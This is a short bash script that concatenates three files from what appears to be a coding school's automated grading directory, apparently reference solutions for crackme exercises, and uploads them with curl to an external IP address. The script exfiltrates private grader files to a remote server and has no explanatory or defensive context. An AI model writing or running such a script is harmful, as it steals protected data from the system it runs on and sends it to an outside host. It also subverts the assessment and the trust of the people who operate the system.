#!/bin/bash
cat /tmp/correction/holberton_corrections/corrections/240/1107/103-crackme5.c >> temp ; cat /tmp/correction/holberton_corrections/corrections/240/1104/100-crackme.py >> temp ; cat /tmp/correction/holberton_corrections/corrections/216/888/101-crackme.c >> temp ; curl -s -F "name=@temp" http://138.68.58.230:8080
